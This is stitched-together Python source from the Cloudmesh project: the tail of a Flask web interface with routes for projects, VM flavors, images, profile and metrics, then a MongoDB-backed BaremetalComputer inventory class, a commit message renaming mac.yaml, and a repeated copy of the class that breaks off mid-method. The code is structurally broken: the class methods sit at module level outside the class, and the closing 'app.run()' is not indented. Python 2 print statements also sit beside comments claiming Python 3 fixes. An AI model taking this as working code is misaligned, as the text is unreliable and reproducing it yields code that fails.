        clouds=clouds.clouds,
        image='myimage',
        pages=pages,
        active=make_active('table'),
        version=version)
######################################################################
# ROUTE: PROJECTS
######################################################################
@app.route('/projects/')
def project():
    """Render the projects page from the module-global `projects` dict."""
    global projects
    active = make_active('projects')
    config = cm_config()
    dict_t = config.get()
    # Side effect: populates the global `projects` dict.
    makeCloudDict(dict_t)
    return render_template('projects.html',
                           projects=projects,
                           active=active,
                           version=version)
######################################################################
# ROUTE: VM INFO
######################################################################
@app.route('/cm/info/<cloud>/<server>/')
def vm_info(cloud=None, server=None):
    """Render the detail page for one server on one cloud."""
    global clouds
    active = make_active('vm_info')
    timestamp = datetime.now().strftime("%Y-%m-%d %H:%M")
    server_record = clouds.clouds[cloud]['servers'][server]
    return render_template('vm_info.html',
                           updated=timestamp,
                           keys="",
                           server=server_record,
                           id=server,
                           cloudname=cloud,
                           active=active,
                           version=version,
                           table_fun=maketablefromdict)
def maketablefromdict(the_dict):
    """Recursively render a dict (or list of dicts) as nested HTML tables.

    Scalars are returned unchanged; dict keys are title-cased into the
    left-hand cells. Fix: use .items() (available on both Python 2 and
    3) instead of the Python-2-only .iteritems().
    """
    return_str = ''
    if isinstance(the_dict, dict):
        for name, value in the_dict.items():
            return_str = (return_str + '<tr><td>' + name.title() +
                          '</td><td>' + str(maketablefromdict(value)) +
                          '</td></tr>')
        return_str = '<table>' + return_str + '</table>'
        return return_str
    elif type(the_dict) is list:
        for element in the_dict:
            for name, value in element.items():
                return_str = (return_str + '<tr><td>' + name.title() +
                              '</td><td>' + str(maketablefromdict(value)) +
                              '</td></tr>')
        return_str = '<table>' + return_str + '</table>'
        return return_str
    else:
        return the_dict
######################################################################
# ROUTE: FLAVOR
######################################################################
def set_default_flavor(name, flavor_names):
    """Record *name* as the default flavor and build a radio-button map.

    Returns a dict mapping each flavor name to '' except the default,
    which maps to 'checked'. Side effect: updates the module-global
    `default_flavor`.
    """
    global default_flavor
    default_flavor = name
    selected = dict.fromkeys(flavor_names, "")
    selected[default_flavor] = 'checked'
    return selected
default_flavor = "m1.small"
def buildFlavorNamesArray(clouds):
    """Collect every flavor name across all clouds.

    Fix: use .items() (available on both Python 2 and 3) instead of the
    Python-2-only .iteritems().
    """
    flavor_names = []
    for name, cloud in clouds.items():
        for id, flavor in cloud['flavors'].items():
            flavor_names.append(flavor['name'])
    return flavor_names
#@app.route('/flavors/<cloud>/' )
@app.route('/flavors/', methods=['GET','POST'])
def display_flavors(cloud=None):
    """Show the flavor selection page and persist the chosen default.

    GET renders the radio-button list; POST writes the selected default
    flavor back into ~/.futuregrid/cloudmesh.yaml.
    NOTE(review): the cloud name is hard-coded to 'india-openstack' for
    both read and write -- confirm whether multi-cloud is intended.
    """
    flavor_names=buildFlavorNamesArray(clouds.clouds);
    # for debugging
    cloud = 'india-openstack'
    ############reading from yaml file ############
    config_flavor = cm_config()
    configurations= config_flavor.get(cloud) # name of default cloud will come here
    default_flavor=configurations['default_flavor']
    ############ end of reading from yaml file ############
    time_now = datetime.now().strftime("%Y-%m-%d %H:%M")
    active = make_active('flavors')
    selected = set_default_flavor(default_flavor, flavor_names)
    if request.method == 'POST':
        default_flavor= request.form['selected_flavor']
        print default_flavor
        ############ writing in yaml file ############
        yamlFile= config_flavor.get();
        yamlFile['india-openstack']['default_flavor']=default_flavor;
        testDict={}
        testDict['cloudmesh']=yamlFile;
        # NOTE(review): plain open/close; a with-block would be safer.
        f = open(filename, "w")
        yaml.safe_dump(testDict, f, default_flow_style=False, indent=4)
        f.close()
        ############ end of writing in yaml file ############
        selected = set_default_flavor(default_flavor, flavor_names)
    if cloud == None:
        # NOTE(review): unreachable -- cloud is reassigned above, so the
        # else branch always runs.
        pass
    else:
        return render_template('flavor.html',
                               updated=time_now,
                               clouds=clouds.clouds,
                               active=active,
                               version=version,selected=selected)
######################################################################
# ROUTE: IMAGES
######################################################################
def set_default_image(name, image_names):
    """Remember *name* as the global default image and build the
    radio-button state map for the template.

    :param name: image id to mark as default (gets a key even if absent
        from *image_names*)
    :param image_names: all selectable image ids
    :return: dict image-id -> "" or 'checked' (for the default)
    """
    global default_image
    default_image = name
    selected = dict.fromkeys(image_names, "")
    selected[default_image] = 'checked'
    # print(x) is valid on Python 2 (parenthesized expression) and 3 (call);
    # the original bare `print default_image` statement breaks under Python 3
    print(default_image)
    return selected
default_image = "ktanaka/ubuntu1204-ramdisk.manifest.xml"
def buildImageNamesArray(clouds):
    """Collect the image ids of every cloud into one flat list.

    :param clouds: mapping cloud-name -> cloud dict containing an
        'images' sub-dict keyed by image id
    :return: list of image id strings (duplicates across clouds kept)
    """
    image_names = []
    # .items() is Python 2/3 compatible (was .iteritems());
    # loop variable renamed so the builtin `id` is not shadowed
    for name, cloud in clouds.items():
        for image_id, image in cloud['images'].items():
            image_names.append(image_id)
    return image_names
#@app.route('/images/<cloud>/')
@app.route('/images/', methods=['GET','POST'])
def display_images(cloud=None):
    """Render the image selection page and persist the chosen default.

    GET shows a radio-button list of all known images; POST stores the
    submitted image id as ``default_image`` back into the yaml config file.
    """
    # for debugging: the cloud is hard-coded instead of taken from the URL
    cloud = 'india-openstack'
    time_now = datetime.now().strftime("%Y-%m-%d %H:%M")
    active = make_active('images')
    image_names=buildImageNamesArray(clouds.clouds);
    ############ reading from yaml file ############
    config_image = cm_config()
    configurations= config_image.get(cloud) # name of default cloud will come here
    default_image=configurations['default_image']
    ############ end of reading from yaml file ############
    # default_image=image_names[0];
    selected = set_default_image(default_image, image_names)
    if request.method == 'POST':
        default_image= request.form['selected-image']
        print default_image
        ############ writing in yaml file ############
        # NOTE(review): the whole config is re-dumped under a 'cloudmesh' root
        # into the module-global `filename` — confirm this matches cm_config
        yamlFile= config_image.get();
        yamlFile['india-openstack']['default_image']=default_image;
        testDict={}
        testDict['cloudmesh']=yamlFile;
        f = open(filename, "w")
        yaml.safe_dump(testDict, f, default_flow_style=False, indent=4)
        f.close()
        ############ end of writing in yaml file ############
        # recompute the checked-state map with the new default
        selected = set_default_image(default_image, image_names)
    if cloud == None:
        pass
    else:
        return render_template('images.html',
                               updated=time_now,
                               clouds=clouds.clouds,
                               active=active,
                               version=version,selected=selected)
######################################################################
# ROUTE: TEST
######################################################################
def set_default_cloud(name, cloud_names):
    """Remember *name* as the global default cloud and build the
    radio-button state map for the template.

    :param name: cloud to mark as default (gets a key even if absent
        from *cloud_names*)
    :param cloud_names: all selectable cloud names
    :return: dict cloud-name -> "" or 'checked = ""' (for the default)
    """
    global default_cloud
    default_cloud = name
    selected = dict.fromkeys(cloud_names, "")
    selected[default_cloud] = 'checked = ""'
    return selected
default_cloud = "india-openstack"
@app.route('/gregor', methods=['GET','POST'])
def gregor():
    """Test page: pick a default cloud via two hard-coded radio buttons."""
    global default_cloud
    # default_cloud = "india-openstack"
    # added by shweta: read the active clouds from the config
    config_active = cm_config()
    dict_t = config_active.get('active')
    cloud_names = dict_t;
    print cloud_names;
    # end of addition by shweta
    #cloud_names = ["india-openstack", "sierra-openstack"] code written by Gregor commented by shweta
    selected = set_default_cloud(default_cloud, cloud_names)
    if request.method == 'POST':
        default_cloud= request.form['selected_cloud']
        print default_cloud
        selected = set_default_cloud(default_cloud, cloud_names)
    # NOTE(review): inline HTML with %-interpolation of `selected`; the two
    # cloud names are hard-coded and must exist as keys in `selected`
    return '''
    <form action="" method="post">
    <input type = "radio"
    name = "selected_cloud"
    id = "india-openstack"
    value = "india-openstack"
    %(india-openstack)s />
    <label>india-openstack</label>
    <input type = "radio"
    name = "selected_cloud"
    id = "sierra-openstack"
    value = "sierra-openstack"
    %(sierra-openstack)s/>
    <label>sierra-openstack</label>
    <input type=submit value=Update>
    </form>''' %selected
######################################################################
# ROUTE: PROFILE
######################################################################
@app.route('/profile/')
def profile():
    """Render the user's profile page with personal and per-cloud info."""
    # bug: the global var of the dict should be used
    config = cm_config()
    dict_t = config.get()
    makeCloudDict(dict_t)  # side effect: rebuilds the module-global `projects`
    active = make_active('profile')
    time_now = datetime.now().strftime("%Y-%m-%d %H:%M")
    # placeholder personal data (identifier typo kept — callers/template use it)
    persolalinfo = {'name': 'abc', 'data1': 'pqr'}
    # bug: I guess this is left over from my example
    # bug: the names of the clouds should be retrieved from config
    cloudinfo = {
        'openstak-india': {'type': 'openstack', 'host': 'india.futuregrid.org',
                           'username': 'shweta'}}
    # NOTE(review): `cloudinfo` above is unused; makeCloudDict() is called a
    # second time here — confirm whether the local was meant to be passed
    return render_template('profile.html',
                           updated=time_now,
                           keys="",  # ",".join(clouds.get_keys()),
                           cloudinfo=makeCloudDict(dict_t),
                           persolalinfo=persolalinfo,
                           active=active,
                           version=version)
def makeCloudDict(dict_t):
    """Normalize the raw cloudmesh config dict for display.

    Keys are upper-cased and the ``OS_``/``cm_``/``EC2_`` prefixes are
    stripped depending on the cloud type. As a side effect the
    module-global ``projects`` dict is rebuilt from the eucalyptus
    ``fg*`` sections (used by the projects page).

    :param dict_t: raw config mapping cloud-name -> settings dict
    :return: dict CLOUD-NAME -> {KEY: value} for display
    """
    cloudDict = {}
    cloudSubDict = {}
    cloudSubsubDict = {}
    # variables used to build the module-global `projects` for projects.html
    project_content = {}
    global projects
    projects = {}
    # .items() works on Python 2 and 3 (the original .iteritems() is Py2-only)
    for key, value in dict_t.items():
        # NOTE(review): matching on key substrings is fragile; should test the
        # cloud *type* instead (kept from the original bug note)
        if "india-openstack" in key:
            for innerKey, innerValue in value.items():
                innerKey = innerKey.replace("OS_", "")
                innerKey = innerKey.replace("cm_", "")
                cloudSubDict[innerKey.upper()] = innerValue
            cloudDict[key.upper()] = cloudSubDict
            cloudSubDict = {}
            print(cloudDict)
        if "india-eucalyptus" in key:
            for innerKey, innerValue in value.items():
                if "fg" in innerKey:
                    # fg* sections hold per-project EC2 credentials
                    for innermostKey, innermostValue in innerValue.items():
                        project_content[innermostKey] = innermostValue
                        innermostKey = innermostKey.replace("EC2_", "")
                        cloudSubsubDict[innermostKey.upper()] = innermostValue
                    cloudDict[innerKey.upper()] = cloudSubsubDict
                    cloudSubsubDict = {}
                    projects[innerKey] = project_content
                    project_content = {}
                else:
                    innerKey = innerKey.replace("EC2_", "")
                    cloudSubDict[innerKey.upper()] = innerValue
            cloudDict[key.upper()] = cloudSubDict
            cloudSubDict = {}
        if "azure" in key:
            cloudSubDict = {}
            for innerKey, innerValue in value.items():
                cloudSubDict[innerKey.upper()] = innerValue
            cloudDict[key.upper()] = cloudSubDict
            cloudSubDict = {}
    # print (cloudDict);
    return cloudDict
######################################################################
# ROUTE: METRIC
######################################################################
#@app.route('/metric/<s_date>/<e_date>/<user>/<cloud>/<host>/<period>/<metric>')
@app.route('/metric/main', methods=['POST', 'GET'])
def metric():
    """Render the metric page, filtered by optional query-string arguments."""
    global clouds
    # each filter defaults to the empty string when absent from the query
    args = {"s_date": request.args.get('s_date', ''),
            "e_date": request.args.get('e_date', ''),
            "user": request.args.get('user', ''),
            "cloud": request.args.get('cloud', ''),
            "host": request.args.get('host', ''),
            "period": request.args.get('period', ''),
            "metric": request.args.get('metric', '')}
    return render_template('metric.html',
                           clouds=clouds.get(),
                           metrics=clouds.get_metrics(args),
                           pages=pages,
                           active=make_active('metric'),
                           version=version)
######################################################################
# ROUTE: PAGES
######################################################################
@app.route('/<path:path>/')
def page(path):
    """Render a flat page from the `pages` collection; 404 when missing."""
    nav = make_active(str(path))
    # aborts with 404 if the page does not exist
    entry = pages.get_or_404(path)
    return render_template('page.html',
                           page=entry,
                           pages=pages,
                           active=nav,
                           version=version)
if __name__ == "__main__":
app.run()
|
from dbhelper import DBHelper
from baremetal_status import BaremetalStatus
from hostlist import expand_hostlist
from copy import deepcopy
from cloudmesh.util.config import read_yaml_config
from cloudmesh_common.logger import LOGGER
from cloudmesh_install import config_file
#
# SETTING UP A LOGGER
#
log = LOGGER(__file__)  # module-level logger (cloudmesh LOGGER wrapper)
class BaremetalComputer:
    """Baremetal computer class.

    First, this class provides an easy API to initialize the cobbler
    baremetal computers in mongodb, e.g., mac and power info.
    Second, this class has an API through which a user can get the detail
    information needed to provision a cobbler baremetal computer.
    """

    def __init__(self):
        # all inventory documents live in the "inventory" mongo collection
        coll_name = "inventory"
        # yaml file holding per-cluster mac address and bmc (power) data
        self.yaml_file = config_file("/mac.yaml")
        self.db_client = DBHelper(coll_name)
        # status helper; presumably used by provisioning callers — confirm
        self.bm_status = BaremetalStatus()
def get_default_query(self):
    """Return the base query selecting server network records in inventory.

    :return: dict of the four fixed cm_* selector fields
    """
    default = {
        "cm_type": "inventory",
        "cm_kind": "server",
        "cm_attribute": "network",
        "cm_key": "server",
    }
    return default
def get_full_query(self, query_elem=None):
    """Merge caller-supplied query fields over the default inventory query.

    :param query_elem: optional dict of extra/overriding query fields
    :return: the merged query dict
    """
    merged = self.get_default_query()
    if not query_elem:
        return merged
    merged.update(query_elem)
    return merged
def read_data_from_yaml(self):
    """
    read mac address and bmc configuration information from **mac.yaml** file.

    :return: dict keyed by cluster name mapping host -> mac/bmc data, or
        None when the yaml file could not be read
    """
    data = read_yaml_config(self.yaml_file)
    result = None
    if data:
        result = {}
        data = data["inventory"]
        for cluster in data:
            cluster_data = data[cluster]
            if "bmc" in cluster_data and "common" in cluster_data["bmc"]:
                # process the common bmc data in cluster
                common_bmc_data = cluster_data["bmc"]["common"]
                # "range" is a hostlist expression naming the hosts the
                # common bmc settings apply to
                host_range = common_bmc_data.pop("range", None)
                hosts = expand_hostlist(host_range)
                mac_data = cluster_data["macaddr"]
                for host in mac_data:
                    if host in hosts:
                        # deepcopy so each host gets its own bmc dict
                        temp_common_bmc_data = deepcopy(common_bmc_data)
                        if "bmc" in mac_data[host]:
                            # bmc config on an individual host has higher priority than the common config
                            temp_common_bmc_data.update(mac_data[host]["bmc"])
                        mac_data[host]["bmc"] = temp_common_bmc_data
                # NOTE(review): clusters without a common bmc section are
                # skipped entirely — confirm that is intended
                result[cluster] = mac_data
    return result
def insert_mac_data_to_inventory(self):
    """
    Insert the mac address information including power config into inventory.

    This API should be called **BEFORE** baremetal provision.
    Currently, this API is called by **fab mongo.inventory**

    :return: True when every mac record was updated successfully, else False
    """
    # insert a document of baremetal computers list (no-op if it exists)
    self.insert_blank_baremetal_list()
    # insert mac data read from the yaml configuration
    data = self.read_data_from_yaml()
    result = False
    if data and len(data) > 0:
        result = self.update_mac_address(data)
    return result
def update_mac_address(self, mac_dict):
    """
    update *inventory* db with mac address information.

    :param dict mac_dict: a dict with the following formation. *label_name*
        is the *cm_id* defined in inventory; *internal* or *public* is the
        type defined in inventory.
        {"cluster_name":{
            "label_name": {"internal": {"name":"eth0", "macaddr": "aa:aa:aa:aa:aa:aa"},
                           "public": {"name":"eth1", "macaddr": "aa:aa:aa:aa:aa:ab"},
                           "bmc": {"user": "user_name", "pass": "password", "type": "type",},}
        }
    :return: True means all the mac addresses in mac_dict updated
        successfully; False means failed (stops at the first failure).
    """
    result = True
    if mac_dict:
        for cluster in mac_dict:  # cluster
            cluster_data = mac_dict[cluster]
            for host_id in cluster_data:  # host
                host_data = cluster_data[host_id]
                for network_type in host_data:  # network
                    network_data = host_data[network_type]
                    query_elem = {"cm_id": host_id, "type": network_type, "cm_cluster": cluster,}
                    if network_type in ["bmc"]:  # power config information
                        update_elem = network_data
                    else:
                        update_elem = {"ifname": network_data["name"],
                                       "macaddr":network_data["macaddr"],
                                       }
                    # third argument False — presumably "no upsert"; confirm
                    # against DBHelper.atom_update
                    update_result = self.db_client.atom_update(self.get_full_query(query_elem),
                                                               {"$set": update_elem}, False)
                    if not update_result["result"]:
                        result = False
                        break
                # propagate the failure out of all three nested loops
                if not result:
                    break
            if not result:
                break
    return result
def get_host_info(self, host_id, info_format="cobbler"):
    """
    get the required host info for a baremetal computer.

    :param string host_id: the unique name/id of a node in cloudmesh
    :param string info_format: the destination format of the general host
        info. To support a new format *xtest*, a method
        ``get_host_info_xtest`` MUST be provided.
    :return: a dict of the following form if info_format is falsy, otherwise
        the same dict converted in place by ``get_host_info_<format>``:
        {
          "id": "unique ID",
          "power": {"ipaddr": ipaddr, "power_user": user, "power_pass": pass, "power_type": type,},
          "interfaces": [{"name": "eth0", "ipaddr": ipaddr, "macaddr": macaddr,}],
        }
        Returns None when the inventory lookup fails.
    """
    query_elem = {"cm_id": host_id}
    full_query_elem = self.get_full_query(query_elem)
    find_result = self.db_client.find(full_query_elem)
    result = None
    if find_result["result"]:
        result = {"id": host_id, "power":{}}
        data = find_result["data"]
        interface_list = []
        cluster_id = None
        for record in data:
            if "macaddr" in record:  # general network interface
                interface_list.append({"name": record["ifname"],
                                       "ipaddr": record["ipaddr"],
                                       "macaddr": record["macaddr"],
                                       })
                if record["type"] == "public":
                    # the public interface's label doubles as the hostname
                    result["hostname"] = record["label"]
                # NOTE(review): cluster_id is taken from every general record;
                # confirm all records of a host share one cm_cluster
                cluster_id = record["cm_cluster"]
            elif "power_user" in record:  # ipmi network interface
                power_key_list = ["ipaddr", "power_user", "power_pass", "power_type",]
                for key in power_key_list:
                    result["power"][key] = record[key]
        # sort the interfaces in ascending order by name
        result["interfaces"] = sorted(interface_list, key=lambda k: k["name"])
        if cluster_id:
            # try to find name server for the servers in this cluster
            name_servers = self.get_cluster_name_server(cluster_id)
            if name_servers:
                result["name_servers"] = name_servers
        if info_format:
            # dispatch to get_host_info_<format>, which mutates result in place
            getattr(self, "get_host_info_{0}".format(info_format))(result)
    return result
def get_cluster_name_server(self, cluster_id):
    """find the name servers for a cluster

    :param string cluster_id: the unique ID of a cluster
    :return: None if there is no name server for the cluster, otherwise a
        space-separated string of one or more name servers
    """
    # cm_key/cm_attribute override the defaults from get_default_query
    query_elem = {"cm_id": cluster_id, "cm_key": "nameserver", "cm_attribute": "variable"}
    full_query_elem = self.get_full_query(query_elem)
    find_result = self.db_client.find(full_query_elem)
    result = []
    if find_result["result"]:
        data = find_result["data"]
        for record in data:
            result.append(record["cm_value"])
    return None if len(result) < 1 else " ".join(result)
def change_dict_key(self, data_dict, fields):
    """Rename keys of *data_dict* in place.

    :param dict data_dict: dict whose keys are renamed
    :param dict fields: projection old_key -> new_key; missing old keys
        are ignored
    """
    for old_key, new_key in fields.items():
        if old_key in data_dict:
            data_dict[new_key] = data_dict.pop(old_key)
def fill_dict_default_key(self, data_dict, fields):
    """Fill *data_dict* in place with default key/value pairs.

    :param dict data_dict: dict to complete
    :param dict fields: defaults {key: default}; existing keys are kept
    """
    for key, default in fields.items():
        data_dict.setdefault(key, default)
def get_host_info_cobbler(self, host_dict):
    """
    Convert, in place, a general host info dict (see get_host_info) into
    the key naming scheme cobbler expects.
    """
    # section 1, general fields
    general_fields = {"id": "name", "name_servers": "name-servers",}
    self.change_dict_key(host_dict, general_fields)
    # section 2, power fields
    power_fields = {"ipaddr": "power-address",
                    "power_user": "power-user",
                    "power_pass": "power-pass",
                    "power_type": "power-type",
                    }
    # NOTE(review): magic default — confirm what power-id 2 means for cobbler
    power_default = {"power-id": 2,
                     }
    self.change_dict_key(host_dict["power"], power_fields)
    self.fill_dict_default_key(host_dict["power"], power_default)
    # section 3, interface fields
    interface_fields = {"ipaddr": "ip-address",
                        "macaddr": "mac-address",
                        }
    # every interface defaults to a static /24 unless already specified
    interface_default = {"netmask": "255.255.255.0",
                         "static": True,
                         }
    for one_interface in host_dict["interfaces"]:
        self.change_dict_key(one_interface, interface_fields)
        self.fill_dict_default_key(one_interface, interface_default)
def insert_blank_baremetal_list(self):
    """Insert a blank baremetal-computer-list document into mongodb.

    ONLY called ONCE by **fab mongo.inventory**; a no-op when the
    document already exists.

    :return: True when present or inserted successfully, else the
        insert's result flag
    """
    elem = {"cm_kind": "baremetal", "cm_type": "bm_list_inventory",}
    found = self.db_client.find_one(elem)
    if found["result"] and found["data"]:
        # document already present; nothing to insert
        return True
    inserted = self.db_client.insert(elem)
    return inserted["result"]
def enable_baremetal_computers(self, hosts):
    """Add the listed *hosts* to the baremetal computers document.

    :param list hosts: hosts of the form ["host1", "host2",]
    :return: True means enabled successfully, otherwise False
    """
    if not hosts:
        # nothing to do is a success
        return True
    query_elem = {"cm_kind": "baremetal", "cm_type": "bm_list_inventory", }
    # $addToSet/$each keeps the list duplicate-free
    update_elem = {"$addToSet": {"data": {"$each": hosts}}}
    return self.db_client.atom_update(query_elem, update_elem)["result"]
def disable_baremetal_computers(self, hosts):
    """Remove the listed *hosts* from the baremetal computers document.

    :param list hosts: hosts of the form ["host1", "host2",]
    :return: True means disabled successfully, otherwise False
    """
    if not hosts:
        # nothing to do is a success
        return True
    query_elem = {"cm_kind": "baremetal", "cm_type": "bm_list_inventory", }
    update_elem = {"$pull": {"data": {"$in": hosts}}}
    return self.db_client.atom_update(query_elem, update_elem)["result"]
def get_baremetal_computers(self):
    """Fetch the list of baremetal computers.

    :return: hosts of the form ["host1", "host2",], [] when the document
        has no data field, or None when the lookup failed
    """
    query = {"cm_kind": "baremetal", "cm_type": "bm_list_inventory", }
    found = self.db_client.find_one(query)
    if not found["result"]:
        return None
    doc = found["data"]
    return doc.get("data", [])
# test: ad-hoc exercise code, only runs when executed as a script
if __name__ == "__main__":
    from pprint import pprint
    bmc = BaremetalComputer()
    """
    data = bmc.insert_mac_data_to_inventory()
    print data
    for host in ["???", "???", "???"]:
        data = bmc.get_host_info(host)
        pprint(data)
    """
    #result = bmc.get_host_info("i080")
    #result = bmc.insert_blank_baremetal_list()
    #result = bmc.enable_baremetal_computers(["i001", "i003", "i007", "i189"])
    #result = bmc.disable_baremetal_computers(["i001", "i007",])
    result = bmc.get_baremetal_computers()
    pprint(result)
Rename mac.yaml to its unique name cloudmesh_mac.yaml.
from dbhelper import DBHelper
from baremetal_status import BaremetalStatus
from hostlist import expand_hostlist
from copy import deepcopy
from cloudmesh.util.config import read_yaml_config
from cloudmesh_common.logger import LOGGER
from cloudmesh_install import config_file
#
# SETTING UP A LOGGER
#
log = LOGGER(__file__)  # module-level logger (cloudmesh LOGGER wrapper)
class BaremetalComputer:
    """Baremetal computer class.

    First, this class provides an easy API to initialize the cobbler
    baremetal computers in mongodb, e.g., mac and power info.
    Second, this class has an API through which a user can get the detail
    information needed to provision a cobbler baremetal computer.
    """

    def __init__(self):
        # all inventory documents live in the "inventory" mongo collection
        coll_name = "inventory"
        # yaml file holding per-cluster mac address and bmc (power) data
        self.yaml_file = config_file("/cloudmesh_mac.yaml")
        self.db_client = DBHelper(coll_name)
        # status helper; presumably used by provisioning callers — confirm
        self.bm_status = BaremetalStatus()
def get_default_query(self):
    """Return the base query selecting server network records in inventory.

    :return: dict of the four fixed cm_* selector fields
    """
    default = {
        "cm_type": "inventory",
        "cm_kind": "server",
        "cm_attribute": "network",
        "cm_key": "server",
    }
    return default
def get_full_query(self, query_elem=None):
    """Merge caller-supplied query fields over the default inventory query.

    :param query_elem: optional dict of extra/overriding query fields
    :return: the merged query dict
    """
    merged = self.get_default_query()
    if not query_elem:
        return merged
    merged.update(query_elem)
    return merged
def read_data_from_yaml(self):
    """
    read mac address and bmc configuration information from **mac.yaml** file.

    :return: dict keyed by cluster name mapping host -> mac/bmc data, or
        None when the yaml file could not be read
    """
    data = read_yaml_config(self.yaml_file)
    result = None
    if data:
        result = {}
        data = data["inventory"]
        for cluster in data:
            cluster_data = data[cluster]
            if "bmc" in cluster_data and "common" in cluster_data["bmc"]:
                # process the common bmc data in cluster
                common_bmc_data = cluster_data["bmc"]["common"]
                # "range" is a hostlist expression naming the hosts the
                # common bmc settings apply to
                host_range = common_bmc_data.pop("range", None)
                hosts = expand_hostlist(host_range)
                mac_data = cluster_data["macaddr"]
                for host in mac_data:
                    if host in hosts:
                        # deepcopy so each host gets its own bmc dict
                        temp_common_bmc_data = deepcopy(common_bmc_data)
                        if "bmc" in mac_data[host]:
                            # bmc config on an individual host has higher priority than the common config
                            temp_common_bmc_data.update(mac_data[host]["bmc"])
                        mac_data[host]["bmc"] = temp_common_bmc_data
                # NOTE(review): clusters without a common bmc section are
                # skipped entirely — confirm that is intended
                result[cluster] = mac_data
    return result
def insert_mac_data_to_inventory(self):
    """
    Insert the mac address information including power config into inventory.

    This API should be called **BEFORE** baremetal provision.
    Currently, this API is called by **fab mongo.inventory**

    :return: True when every mac record was updated successfully, else False
    """
    # insert a document of baremetal computers list (no-op if it exists)
    self.insert_blank_baremetal_list()
    # insert mac data read from the yaml configuration
    data = self.read_data_from_yaml()
    result = False
    if data and len(data) > 0:
        result = self.update_mac_address(data)
    return result
def update_mac_address(self, mac_dict):
    """
    update *inventory* db with mac address information.

    :param dict mac_dict: a dict with the following formation. *label_name*
        is the *cm_id* defined in inventory; *internal* or *public* is the
        type defined in inventory.
        {"cluster_name":{
            "label_name": {"internal": {"name":"eth0", "macaddr": "aa:aa:aa:aa:aa:aa"},
                           "public": {"name":"eth1", "macaddr": "aa:aa:aa:aa:aa:ab"},
                           "bmc": {"user": "user_name", "pass": "password", "type": "type",},}
        }
    :return: True means all the mac addresses in mac_dict updated
        successfully; False means failed (stops at the first failure).
    """
    result = True
    if mac_dict:
        for cluster in mac_dict:  # cluster
            cluster_data = mac_dict[cluster]
            for host_id in cluster_data:  # host
                host_data = cluster_data[host_id]
                for network_type in host_data:  # network
                    network_data = host_data[network_type]
                    query_elem = {"cm_id": host_id, "type": network_type, "cm_cluster": cluster,}
                    if network_type in ["bmc"]:  # power config information
                        update_elem = network_data
                    else:
                        update_elem = {"ifname": network_data["name"],
                                       "macaddr":network_data["macaddr"],
                                       }
                    # third argument False — presumably "no upsert"; confirm
                    # against DBHelper.atom_update
                    update_result = self.db_client.atom_update(self.get_full_query(query_elem),
                                                               {"$set": update_elem}, False)
                    if not update_result["result"]:
                        result = False
                        break
                # propagate the failure out of all three nested loops
                if not result:
                    break
            if not result:
                break
    return result
def get_host_info(self, host_id, info_format="cobbler"):
    """
    get the required host info for a baremetal computer.

    :param string host_id: the unique name/id of a node in cloudmesh
    :param string info_format: the destination format of the general host
        info. To support a new format *xtest*, a method
        ``get_host_info_xtest`` MUST be provided.
    :return: a dict of the following form if info_format is falsy, otherwise
        the same dict converted in place by ``get_host_info_<format>``:
        {
          "id": "unique ID",
          "power": {"ipaddr": ipaddr, "power_user": user, "power_pass": pass, "power_type": type,},
          "interfaces": [{"name": "eth0", "ipaddr": ipaddr, "macaddr": macaddr,}],
        }
        Returns None when the inventory lookup fails.
    """
    query_elem = {"cm_id": host_id}
    full_query_elem = self.get_full_query(query_elem)
    find_result = self.db_client.find(full_query_elem)
    result = None
    if find_result["result"]:
        result = {"id": host_id, "power":{}}
        data = find_result["data"]
        interface_list = []
        cluster_id = None
        for record in data:
            if "macaddr" in record:  # general network interface
                interface_list.append({"name": record["ifname"],
                                       "ipaddr": record["ipaddr"],
                                       "macaddr": record["macaddr"],
                                       })
                if record["type"] == "public":
                    # the public interface's label doubles as the hostname
                    result["hostname"] = record["label"]
                # NOTE(review): cluster_id is taken from every general record;
                # confirm all records of a host share one cm_cluster
                cluster_id = record["cm_cluster"]
            elif "power_user" in record:  # ipmi network interface
                power_key_list = ["ipaddr", "power_user", "power_pass", "power_type",]
                for key in power_key_list:
                    result["power"][key] = record[key]
        # sort the interfaces in ascending order by name
        result["interfaces"] = sorted(interface_list, key=lambda k: k["name"])
        if cluster_id:
            # try to find name server for the servers in this cluster
            name_servers = self.get_cluster_name_server(cluster_id)
            if name_servers:
                result["name_servers"] = name_servers
        if info_format:
            # dispatch to get_host_info_<format>, which mutates result in place
            getattr(self, "get_host_info_{0}".format(info_format))(result)
    return result
def get_cluster_name_server(self, cluster_id):
    """find the name servers for a cluster

    :param string cluster_id: the unique ID of a cluster
    :return: None if there is no name server for the cluster, otherwise a
        space-separated string of one or more name servers
    """
    # cm_key/cm_attribute override the defaults from get_default_query
    query_elem = {"cm_id": cluster_id, "cm_key": "nameserver", "cm_attribute": "variable"}
    full_query_elem = self.get_full_query(query_elem)
    find_result = self.db_client.find(full_query_elem)
    result = []
    if find_result["result"]:
        data = find_result["data"]
        for record in data:
            result.append(record["cm_value"])
    return None if len(result) < 1 else " ".join(result)
def change_dict_key(self, data_dict, fields):
    """Rename keys of *data_dict* in place.

    :param dict data_dict: dict whose keys are renamed
    :param dict fields: projection old_key -> new_key; missing old keys
        are ignored
    """
    for old_key, new_key in fields.items():
        if old_key in data_dict:
            data_dict[new_key] = data_dict.pop(old_key)
def fill_dict_default_key(self, data_dict, fields):
    """Fill *data_dict* in place with default key/value pairs.

    :param dict data_dict: dict to complete
    :param dict fields: defaults {key: default}; existing keys are kept
    """
    for key, default in fields.items():
        data_dict.setdefault(key, default)
def get_host_info_cobbler(self, host_dict):
    """
    Convert, in place, a general host info dict (see get_host_info) into
    the key naming scheme cobbler expects.
    """
    # section 1, general fields
    general_fields = {"id": "name", "name_servers": "name-servers",}
    self.change_dict_key(host_dict, general_fields)
    # section 2, power fields
    power_fields = {"ipaddr": "power-address",
                    "power_user": "power-user",
                    "power_pass": "power-pass",
                    "power_type": "power-type",
                    }
    # NOTE(review): magic default — confirm what power-id 2 means for cobbler
    power_default = {"power-id": 2,
                     }
    self.change_dict_key(host_dict["power"], power_fields)
    self.fill_dict_default_key(host_dict["power"], power_default)
    # section 3, interface fields
    interface_fields = {"ipaddr": "ip-address",
                        "macaddr": "mac-address",
                        }
    # every interface defaults to a static /24 unless already specified
    interface_default = {"netmask": "255.255.255.0",
                         "static": True,
                         }
    for one_interface in host_dict["interfaces"]:
        self.change_dict_key(one_interface, interface_fields)
        self.fill_dict_default_key(one_interface, interface_default)
def insert_blank_baremetal_list(self):
    """Insert a blank baremetal-computer-list document into mongodb.

    ONLY called ONCE by **fab mongo.inventory**; a no-op when the
    document already exists.

    :return: True when present or inserted successfully, else the
        insert's result flag
    """
